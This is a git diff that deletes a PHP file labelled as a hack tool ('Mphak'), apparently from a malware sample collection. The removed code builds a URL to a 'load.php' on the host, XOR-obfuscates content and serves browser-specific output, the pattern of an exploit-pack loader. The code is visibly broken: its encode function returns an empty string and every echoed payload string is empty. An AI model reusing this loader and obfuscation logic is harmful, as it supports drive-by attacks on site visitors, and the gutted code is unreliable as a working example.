diff --git a/PHP/HackTool.PHP.Mphak.c b/PHP/HackTool.PHP.Mphak.c deleted file mode 100644 index 010b89b3..00000000 --- a/PHP/HackTool.PHP.Mphak.c +++ /dev/null @@ -1,65 +0,0 @@ - -$url = "http://".$_SERVER["HTTP_HOST"].str_replace ("\\", "/", dirname ($_SERVER["PHP_SELF"]))."/load.php"; -function encode ($content) { - $str = trim (strip_tags ($content)); - $new = ""; - for ($i = 0; $i < strlen ($str); $i ++) $new .= chr (ord ($str[$i]) ^ 1); - return ''; -} -if ($java == true) echo ''; -elseif ($browser == "MSIE") echo '
'.encode ('').""; -elseif ($browser == "Opera") echo encode (''); -?> \ No newline at end of file